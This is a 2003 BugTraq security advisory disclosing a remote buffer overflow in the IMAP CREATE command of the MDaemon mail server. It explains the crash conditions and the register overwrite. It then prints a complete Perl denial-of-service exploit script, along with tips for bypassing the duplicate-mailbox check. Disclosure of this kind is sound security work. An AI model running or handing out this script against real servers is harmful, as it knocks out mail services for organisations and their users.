BugTraq
MDaemon SMTP/POP/IMAP server =>v.6.7.5: IMAP buffer overflow Apr 27 2003 03:27AM
D4rkGr3y (grey_1999 mail ru)
-----BEGIN PGP SIGNED MESSAGE-----

########################################################*
# Damage Hacking Group security advisory
# www.dhgroup.org
########################################################*
#Product: MDaemon SMTP/POP/IMAP server =>v.6.7.5
#Authors: Alt-N Technologies [www.mdaemon.com]
#Vulnerability: remote buffer overflow in IMAP service
########################################################*

#Overview#-----------------------------------------------------#
- - From help-file:
"MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
commonplace on UNIX hosts and the Internet to Windows based servers
and microcomputers. MDaemon is designed to manage the email needs
of any number of individual users and comes complete with a powerful
set of integrated tools for managing mail accounts and message
formats.
MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
with LDAP support, an integrated browser-based email client, content
filtering, spam blockers, extensive security features, and more."

#Problem#------------------------------------------------------#
Remote buffer overflow was found in MDaemon IMAP service.
A remote authorized user can execute arbitrary code on the
server with SYSTEM privileges.
?Create? command for the IMAP server do not have proper bounds
checking, enabling a user to shutdown the service remotely. It
should be noted that a user account is required.
Remote authorized user may create new mailbox via IMAP service
with mailbox name more then 1Kb. In result, SMTP/POP/IMAP/LDAP
will crash, but WorldClient and WebAdmin will work normally.
For example:
0 CREATE AAAAAAA..[1kb]..AAA
When we send "0 CREATE AAAAAAA..[1kb]..AAA", Server creates
mailbox with name " AAAAA.. [202b..] AAA " and crash. Second time
we exact also we can not attack, because the server will consider,
that the mailbox "AAAAA...AAA" is already created and will refuse
to process command. To bypass it, we must change any character
from the first 202 characters (for example, create " BAAAAAA... AA"
or "BBBBBBB...BB" instead of "AAAAA... AA?).
A vulnerability may use to execute arbitrary code (the remote user
can cause the EAX and EDI registers to be overwritten with
arbitrary data). All code will be run with system privileges (if
MDaemon installed like a system service).

#Exploit#------------------------------------------------------#

#!/usr/bin/perl
###############
#MDaemon SMTP/POP/IMAP server v.6.7.5
#Remote DoS exploit
##Edit this stuff:
$host = "imap_server";
$port = "143";
$login = "login";
$pass = "pass";
#Attention! If exploit doesn't
#work, change this:
$data = "A";
###############
use IO::Socket;
$num = "1000";
$buf .= $data x $num;
print "Connecting... ";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n";
print " OK\n"
print "Attacking... ";
print $socket "DHGroup Login $login $pass\n";
sleep(1);
print $socket "DHGroup CREATE $buf\n";
sleep(1);
print " OK\n";
print "Exiting... \n";
close($socket);
##//www.dhgroup.org//
#EOF

PS. thx to PIG_KILLER [www.securitylab.ru]

Best regards www.dhgroup.org
D4rkGr3y icq 540981

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQCVAwUBPqtN/m4LIpseSJmPAQGxeAQAvDYdM2zMEdFqficvGBHrqTz+owhXEoUs
guRgs/vpHB1Mz4nLaISmtughGNJQg5H03YDzr7UqEasJ40GpxA7CDpzpcqlyO7KX
kOjeTsu6OF+hjmgIwTMJuKgGeXE5GWRS79IZb820w8DrDaIhMLCnu3fUBk+4EV7a
7oxsrKvseVA=
=WnA1
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus